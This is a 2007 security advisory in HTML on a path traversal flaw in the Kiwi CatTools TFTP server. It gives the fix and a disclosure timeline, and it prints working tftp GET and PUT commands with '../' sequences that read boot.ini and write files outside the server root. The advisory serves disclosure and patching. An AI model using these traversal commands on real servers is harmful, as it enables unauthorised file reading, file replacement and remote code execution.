<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.EmailStyle17
{mso-style-type:personal;
font-family:Arial;
color:windowtext;}
span.EmailStyle18
{mso-style-type:personal;
font-family:Arial;
color:navy;}
span.EmailStyle19
{mso-style-type:personal-reply;
font-family:Arial;
color:navy;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<body lang=EN-US link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal style='margin-bottom:12.0pt'><font size=3
face="Times New Roman"><span style='font-size:12.0pt'>Path traversal security
vulnerability in Kiwi CatTools TFTP up to 3.2.8 server can lead to information
disclosure and remote code execution<br>
<br>
Risk: High<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>DISCUSSION<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><br>
Kiwi CatTools TFTP server doesn’t properly verify filename in PUT and GET
request which can be used to download/upload any file from/to server. Default
setting allows replacing of existing files. Such settings lead to probability
to replace an executable files and run code on attacker choice. <br>
<br>
EXAMPLES<br>
<br>
C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt<br>
<br>
Transfer successful: 212 bytes in 1 second, 212 bytes/s<br>
<br>
C:\>type boot.txt<br>
<br>
[boot loader]<br>
timeout=30<br>
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS<br>
<br>
C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt<br>
<br>
Transfer successful: 212 bytes in 1 second, 212 bytes/s<br>
<br>
C:\>type pttest.txt<br>
<br>
[boot loader]<br>
timeout=30<br>
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS<br>
<br>
C:\><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>SOLUTION<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Upgrade to CatTools 3.2.9 which is available for download at <a
href="http://www.kiwisyslog.com/downloads.php"
title="http://www.kiwisyslog.com/downloads.php"><span
title="http://www.kiwisyslog.com/downloads.php">http://www.kiwisyslog.com/downloads.php</span></a><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>CREDITS<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)<br>
<br>
DISCLOSURE TIMELINE<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Vulnerability discovered:
11/20/2006<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Initial vendor contact: <font
color=navy><span style='color:navy'>
</span></font>12/08/2006<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Patch released:
02/13/2007<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Public disclosure:
02/27/2007<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
</div>
</body>
</html>